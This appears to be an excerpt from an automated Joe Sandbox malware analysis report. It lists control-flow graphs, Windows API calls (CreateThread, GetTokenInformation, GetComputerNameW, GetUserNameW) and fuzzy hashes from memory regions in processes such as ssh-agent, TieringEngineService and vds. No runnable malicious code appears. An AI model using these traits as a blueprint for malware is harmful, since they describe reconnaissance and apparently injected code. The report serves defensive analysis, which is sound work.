                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 0e19596be02101642d290634a7bf5cd63e8a65d74ff32c1e8e3327f81190055b
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: 5001D23050DFC68FDB9657268C2877A7790AB1432FF3401ABC487CA291DAAC4902A71F

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 414 4e5b87-4e5b99 CreateThread 415 4e5cff-4e5d01 414->415 416 4e5b1c-4e5b3b 414->416 417 4e5d07 415->417 418 4e5bb4-4e5ce4 CreateThread 415->418 416->415 417->418 419 4e5d0d 417->419 424 4e5cea 418->424 425 4e5c01-4e5c05 418->425 423 4e5d37-4e5d41 419->423 426 4e5d4b-4e5d52 423->426 427 4e5d43 423->427 424->425 428 4e5cf0-4e5cf6 424->428 425->423 432 4e5c20-4e5c68 425->432 429 4e5d54 426->429 430 4e5d45-4e5d47 426->430 427->429 428->432 433 4e5d5f 430->433 434 4e5d49 430->434 437 4e5d65 433->437 434->426 434->433 437->437
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: dbeb2e16f859bb0227576a5dc984b722c581526328c71f70f9e6cfc359dbde65
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 19E0863060DB844FDB999B2558203197AE5EB88319F1502CFC44ADB2D5CB6D1A06479B

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 438 4e599b-4e599e 439 4e59b8 call 500df0 438->439 440 4e59f7 438->440 444 4e59bd-4e59c2 call 4e5d90 439->444 441 4e5a02 440->441 445 4e597d 441->445 446 4e59d4-4e5a15 call 5011a0 441->446 448 4e59c7-4e59ce 444->448 445->446 450 4e597f-4e5981 445->450 451 4e5a1a-4e5a26 call 4e5e10 448->451 452 4e59d0 448->452 454 4e5983-4e5a38 450->454 451->439 467 4e5a08-4e5a0b 451->467 452->451 455 4e59d2-4e59d8 452->455 461 4e5a3e 454->461 462 4e5994-4e599c 454->462 468 4e59d9-4e59de call 512190 455->468 461->468 462->441 466 4e599e 462->466 466->440 467->462 469 4e5a0d 467->469 468->462 475 4e59e0 468->475 473 4e5932 469->473 474 4e5991 469->474 476 4e59e4-4e59ec call 5121ac 473->476 474->473 477 4e5993 474->477 475->462 478 4e59e2 475->478 481 4e59ed 476->481 482 4e5a62-4e5a6e 476->482 477->462 478->476 481->454 483 4e59ee-4e59ef 481->483 484 4e5a75-4e5ab3 call 501280 482->484 485 4e5a70 482->485 483->454 487 4e59f1 call 519970 483->487 495 4e5abb-4e5ac9 484->495 496 4e5ab5 484->496 485->484 488 4e5a72 485->488 487->439 488->484 498 4e5af2-4e5af5 495->498 496->495 497 4e5ab7-4e5ab9 496->497 497->495 501 4e5adb-4e5adc 498->501 502 4e5ad5 498->502 504 4e5a45-4e5a46 501->504 505 4e5ae2 501->505 502->501 503 4e5ad7-4e5ad9 502->503 503->501 505->504 506 4e5ae8 505->506 506->498
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: b94851aa68514fcc40576e3f1d8ba20a74da344cded9cd26ff10a4dcf753a6d1
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: BC0126E0A0DEC0CFD61BEB1B44052FA2552BB9432EF2805AB904AC7293CA2C4D02974F

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 507 4e8090-4e8096 508 4e813c-4e81a5 507->508 509 4e8184 507->509 522 4e81bd-4e81ca 508->522 523 4e81a7 508->523 510 4e818c-4e8192 509->510 511 4e8186 CloseHandle 509->511 513 4e8194 510->513 514 4e8115-4e8118 510->514 511->510 513->514 515 4e819a 513->515 517 4e8119-4e811a 514->517 518 4e80a7 514->518 515->508 517->518 519 4e811c 517->519 521 4e820f 519->521 524 4e808e-4e8096 521->524 525 4e8215-4e821e 521->525 528 4e80f3 522->528 529 4e81d0 522->529 524->509 525->524 532 4e8224 525->532 530 4e808c 528->530 531 4e80f5 528->531 538 4e81fe-4e8201 GetTokenInformation 529->538 539 4e80c3 529->539 530->524 531->530 541 4e8077 531->541 536 4e8226 532->536 537 4e81d7-4e81e6 call 51715c 532->537 536->537 542 4e8228-4e82ee call 4e5d90 536->542 547 4e80ca-4e810f GetTokenInformation 537->547 556 4e8089 537->556 538->521 554 4e81b7 538->554 539->538 544 4e80c9 539->544 541->537 562 4e830c-4e8320 call 4e5d90 call 4eec00 542->562 563 4e82f0 542->563 544->547 558 4e812d 547->558 559 4e8111 547->559 554->521 557 4e81b9-4e81bb 554->557 556->547 564 4e808b 556->564 557->522 560 4e80a8 558->560 561 4e8133-4e81f0 558->561 559->558 565 4e8113 559->565 568 4e80aa-4e80ad 560->568 570 4e80da-4e80f1 561->570 571 4e81f6 561->571 572 4e82f7-4e82fc call 4e5d90 562->572 595 4e8322 562->595 563->562 567 4e82f2 563->567 564->530 565->514 567->572 574 4e8163-4e8170 call 517164 568->574 575 4e80b3-4e8203 568->575 570->568 571->570 576 4e81fc 571->576 587 4e8302 572->587 588 4e8253-4e8265 call 501280 572->588 574->511 589 4e8172 574->589 575->574 582 4e8209 575->582 576->538 587->588 593 4e8308-4e830a 587->593 597 4e826b 588->597 598 4e8328 588->598 589->510 593->562 595->572 596 4e8324-4e8326 595->596 596->598 597->598 601 4e823f-4e8243 597->601 602 4e82df-4e832b 598->602 603 4e8335 598->603 601->572 602->603 606 
4e832d-4e8331 602->606 607 4e829b-4e829d 603->607 608 4e8287 603->608 606->603 608->607 610 4e824e-4e8252 608->610 610->588
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: 2511c999b861efeef758db57839f487845bca07faddff315f40557303e3db930
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: AAC08C701289CA965E38038B0C0B1B2E6109302353B0C000F8C0E80321ED0C8E03019F

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 611 4e817f 612 4e8184 611->612 613 4e818c-4e8192 612->613 614 4e8186 CloseHandle 612->614 615 4e8194 613->615 616 4e8115-4e8118 613->616 614->613 615->616 617 4e819a-4e81a5 615->617 618 4e8119-4e811a 616->618 619 4e80a7 616->619 629 4e81bd-4e81ca 617->629 630 4e81a7 617->630 618->619 620 4e811c 618->620 622 4e820f 620->622 624 4e808e-4e8096 622->624 625 4e8215-4e821e 622->625 624->612 625->624 631 4e8224 625->631 639 4e80f3 629->639 640 4e81d0 629->640 632 4e8226 631->632 633 4e81d7-4e81e6 call 51715c 631->633 632->633 636 4e8228-4e82ee call 4e5d90 632->636 654 4e80ca-4e810f GetTokenInformation 633->654 655 4e8089 633->655 659 4e830c-4e8320 call 4e5d90 call 4eec00 636->659 660 4e82f0 636->660 642 4e808c 639->642 643 4e80f5 639->643 650 4e81fe-4e8201 GetTokenInformation 640->650 651 4e80c3 640->651 642->624 643->642 652 4e8077 643->652 650->622 670 4e81b7 650->670 651->650 656 4e80c9 651->656 652->633 664 4e812d 654->664 665 4e8111 654->665 655->654 661 4e808b 655->661 656->654 669 4e82f7-4e82fc call 4e5d90 659->669 698 4e8322 659->698 660->659 663 4e82f2 660->663 661->642 663->669 667 4e80a8 664->667 668 4e8133-4e81f0 664->668 665->664 671 4e8113 665->671 676 4e80aa-4e80ad 667->676 678 4e80da-4e80f1 668->678 679 4e81f6 668->679 686 4e8302 669->686 687 4e8253-4e8265 call 501280 669->687 670->622 675 4e81b9-4e81bb 670->675 671->616 675->629 681 4e8163-4e8170 call 517164 676->681 682 4e80b3-4e8203 676->682 678->676 679->678 685 4e81fc 679->685 681->614 697 4e8172 681->697 682->681 693 4e8209 682->693 685->650 686->687 694 4e8308-4e830a 686->694 701 4e826b 687->701 702 4e8328 687->702 694->659 697->613 698->669 699 4e8324-4e8326 698->699 699->702 701->702 705 4e823f-4e8243 701->705 706 4e82df-4e832b 702->706 707 4e8335 702->707 705->669 706->707 710 4e832d-4e8331 706->710 711 
4e829b-4e829d 707->711 712 4e8287 707->712 710->707 712->711 714 4e824e-4e8252 712->714 714->687
APIs
Memory Dump Source
• Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction ID: 7001ae787e5aa22e0152516e00de58440ab77f5346329517ba0f713c27da1d53
• Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction Fuzzy Hash: E9C048A055868986593827CA2C0A1B2A5645712762B09462BAC0E9A362ED5C4D4346AE

Control-flow Graph
APIs
• GetSystemDefaultLangID.KERNELBASE ref: 007D53C4
Memory Dump Source
• Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0
• Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction ID: 9f2ec5aa84b500c5ce5983bb28560dbb1fea8755c4e1822e0daf343880ac3ff2
• Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction Fuzzy Hash: 4141E7A140DED58FD72A462448643707BB0AB223EAF9D05D7D4C2CB3E2E19C5C859767

Control-flow Graph
APIs
Memory Dump Source
• Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
• Instruction ID: a010ff8db0a7fd4c6fa25a8435d428d7a498676befa5c1418ce4233b8a32d1d1
• Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
• Instruction Fuzzy Hash: F3D13631518B0D8BC728EF58C8457FAB3D1FBA0310F58461FDA46C7366DA78DA4586C2

Control-flow Graph
Memory Dump Source
• Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
• Instruction ID: f705c41dd1ce3a9dd19cb82811641ec8f54ce8202bd5e5811af2f6e56a5d5b08
• Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
• Instruction Fuzzy Hash: 9261127060CA49DFC7E59B2888583397BB0FB55360F68065BE44AC33A0DF2DAC4A9753

Control-flow Graph
Memory Dump Source
• Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
• Instruction ID: dd030ea929924df9b248719b8a01b71956390c042cc1bbed908b9ae5dd70a1ac
• Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
• Instruction Fuzzy Hash: 66F1262071DE4CCFC76AA72C58553BA77E2FB99320F58419BE14AC3396DD2C9C468782

Control-flow Graph
Memory Dump Source
• Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction ID: 5cb1fc14b6b70ceb068c4c9ba181c3f6b5947ecb48238432e299b3ed6d59a3bd
• Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction Fuzzy Hash: C221B03022CF46CFCB699B18849877476F2EB55351F6802A7844FCF3A6DA6C8C449772

Control-flow Graph
Memory Dump Source
• Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction ID: f27e27d2af68416b0f92edf14ed99b1f8f69e2bc52c907cc28f268c094606e76
• Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction Fuzzy Hash: A501F57021DF478FDB6557248C583797BB1EB11324F2901ABC48BCA395DA6C4900A732

Control-flow Graph
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: bfead7c4756c00284398140250957747a7b01731f29ed647bd9ba65c473c6d14
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 66E0867061DB484FDB599B2458203293EF5EB88310F1501CFC44ADB2D1CB7D09054796

Control-flow Graph (function at 7d599b; graph annotates internal calls to 7f0df0, 7d5d90, 7f11a0, 7d5e10, 802190, 8021ac, 809970 and 7f1280; rendered graph and edge list omitted)
APIs
Memory Dump Source
• Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction ID: 971551cf1f85ba6609cf53f4e605bff33f4daeb40537088e541ebf14741e5094
• Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction Fuzzy Hash: 6D01F970A0DE90CFD757971844692796A72F794330F28555BA08ACB393DC3C6D009752

Control-flow Graph (function at 7d8090; graph annotates CloseHandle and GetTokenInformation calls and internal calls to 80715c, 7d5d90, 7dec00, 807164 and 7f1280; rendered graph and edge list omitted)
APIs
Memory Dump Source
• Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction ID: 16c62c5db29afdb0126027ccede620c42761c7eb7b6e36da0a415be928e715e7
• Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction Fuzzy Hash: CFC04C6152995EB756F906485C1B4B826709606791B1C044F9C0A81320DD5F8E4F55A7

Control-flow Graph (function at 7d817f; graph annotates CloseHandle and GetTokenInformation calls and internal calls to 80715c, 7d5d90, 7dec00, 807164 and 7f1280; rendered graph and edge list omitted)
APIs
Memory Dump Source
• Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction ID: 1b89de7a9292d5d92c799f2d3a346bf665fb838ce62cdc1c5ca208d2e230a382
• Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction Fuzzy Hash: F8C092A055950DA751F926886C0A0B9357096137A0F0C441FEC0A8A360DD5F8D4F45F3

Control-flow Graph (function at bc52a0; graph annotates a GetSystemDefaultLangID call at bc53c4; rendered graph and edge list omitted)
APIs
• GetSystemDefaultLangID.KERNELBASE ref: 00BC53C4
Memory Dump Source
• Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0
• Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction ID: 22ca38aa462139891ad997b817fd2c6cff5c9150a01df945659ece81687ea8d7
• Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction Fuzzy Hash: CC41D4A150DED58FD73A422448A4F717BD0EB923E2F9901DED0C38A1E6E1987CC1932A

Control-flow Graph (function at be0080; graph annotates GetComputerNameW, VirtualFree and GetUserNameW calls and internal calls to bce050, bf7164, bf715c and bf9970; rendered graph and edge list omitted)
APIs
Memory Dump Source
• Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
• Instruction ID: c11ee5687c00c96b91de077c18f7551a54bbc0b244710c1d6e6b7626570a282a
• Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
• Instruction Fuzzy Hash: 89D12831428B4D8BC724FF59D8857EAB3E1FBA0310F18469FE446C7165DBB4D68586C2

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 79 bc8070-bc817e 81 bc813d-bc81a5 79->81 82 bc8180 79->82 93 bc81bd-bc81ca 81->93 94 bc81a7 81->94 83 bc815f 82->83 84 bc8184 82->84 83->81 86 bc8161 83->86 87 bc818c-bc8192 84->87 88 bc8186 CloseHandle 84->88 90 bc8163-bc8170 call bf7164 86->90 91 bc8194 87->91 92 bc8115-bc8118 87->92 88->87 90->88 104 bc8172 90->104 91->92 96 bc819a 91->96 97 bc8119-bc811a 92->97 98 bc80a7 92->98 107 bc81d0 93->107 108 bc80f3 93->108 100 bc813c 96->100 97->98 101 bc811c 97->101 100->84 102 bc820f 101->102 105 bc808e-bc8096 102->105 106 bc8215-bc821e 102->106 104->87 105->84 105->98 106->105 116 bc8224 106->116 117 bc81fe-bc8201 GetTokenInformation 107->117 118 bc80c3 107->118 109 bc808c 108->109 110 bc80f5 108->110 109->105 110->109 115 bc8077 110->115 121 bc81d7-bc81de call bf715c 115->121 116->121 122 bc8226 116->122 117->102 128 bc81b7 117->128 118->117 120 bc80c9 118->120 124 bc80ca-bc80d8 GetTokenInformation 120->124 130 bc81e3-bc81e6 121->130 122->121 125 bc8228-bc82ee call bc5d90 122->125 127 bc810f 124->127 146 bc830c-bc831e 125->146 147 bc82f0 125->147 133 bc812d 127->133 134 bc8111 127->134 128->102 132 bc81b9-bc81bb 128->132 130->124 142 bc8089 130->142 132->93 137 bc80a8 133->137 138 bc8133 133->138 134->133 140 bc8113 134->140 144 bc80aa-bc80ad 137->144 138->100 141 bc81ed-bc81f0 138->141 140->92 148 bc80da-bc80f1 141->148 149 bc81f6 141->149 142->124 145 bc808b 142->145 144->90 150 bc80b3-bc8203 144->150 145->109 151 bc8320 146->151 152 bc82a1-bc82ba call bc5d90 call bcec00 146->152 147->146 153 bc82f2 147->153 148->144 149->148 154 bc81fc 149->154 150->90 156 bc8209 150->156 159 bc82f7-bc82fc call bc5d90 151->159 160 bc8322 151->160 152->151 153->159 154->117 168 bc8302 159->168 169 bc8253-bc8265 call be1280 159->169 160->159 163 bc8324-bc8326 160->163 164 bc8328 163->164 173 
bc82df-bc832b 164->173 174 bc8335 164->174 168->169 172 bc8308-bc830a 168->172 169->164 179 bc826b 169->179 172->146 173->174 180 bc832d-bc8331 173->180 176 bc826e-bc8285 174->176 181 bc829b-bc829d 176->181 182 bc8287 176->182 179->176 183 bc8239 179->183 180->174 181->152 184 bc824c 182->184 183->164 186 bc823f-bc8243 183->186 184->181 185 bc824e-bc8252 184->185 185->176 186->159 186->184
Memory Dump Source
• Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph [graph omitted]

Memory Dump Source
• Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph [graph omitted; references CreateThread]

Memory Dump Source
• Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph [graph omitted; references CreateThread]

Memory Dump Source
• Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph [graph omitted; references CreateThread]

APIs
Memory Dump Source
• Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0

Control-flow Graph [graph omitted]

APIs
Memory Dump Source
• Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0

Control-flow Graph [graph omitted; references CloseHandle, GetTokenInformation]

APIs
Memory Dump Source
• Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0

Control-flow Graph [graph omitted; references CloseHandle, GetTokenInformation]

APIs
Memory Dump Source
• Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: e6c7f18aca96b79a919b6707949ccb2e6951efd0498291b024f145593229dddd
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: 09C092B05A850987563A2A882C0AEB235D4C61F7A0F0E58DEED16BA361DD684D8341B2

Control-flow Graph

• Executed
• Not Executed
• Control-flow graph data omitted (rendered by the interactive graph viewer in the original report); entry block b752a0-b753fe, basic blocks in the range b752a0-b7547b plus bb0d4c-bb0d4e; API call shown in the graph: GetSystemDefaultLangID (b753c4-b753ca); no internal calls
APIs
• GetSystemDefaultLangID.KERNELBASE ref: 00B753C4
Memory Dump Source
• Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_b70000_vds.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0
• Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction ID: ec068ce22cfa21bce38de050bb5f932b5818358cad611dedae57f049abad7fd5
• Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction Fuzzy Hash: E641C5A180DE958FD736432448A42747BE0DB113E2F9EC5D6D4FF8A1F6E2D84C81936A

Control-flow Graph

• Executed
• Not Executed
• Control-flow graph data omitted (rendered by the interactive graph viewer in the original report); entry block b90080-b90286, basic blocks in the range b90080-b905d9 plus b9b1ee-b9b49f; API calls shown in the graph: GetComputerNameW (b90458-b90472, b904cc-b904e6), GetUserNameW (b903bf-b903d9), VirtualFree (b90181); internal calls to b7e050 (twice), ba7164, ba715c and ba9970
APIs
Memory Dump Source
• Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_b70000_vds.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
• Instruction ID: 2d91b10aa35703d2cac745044183ead5c0a82ce2fe72fe3cc192b67e27df37d5
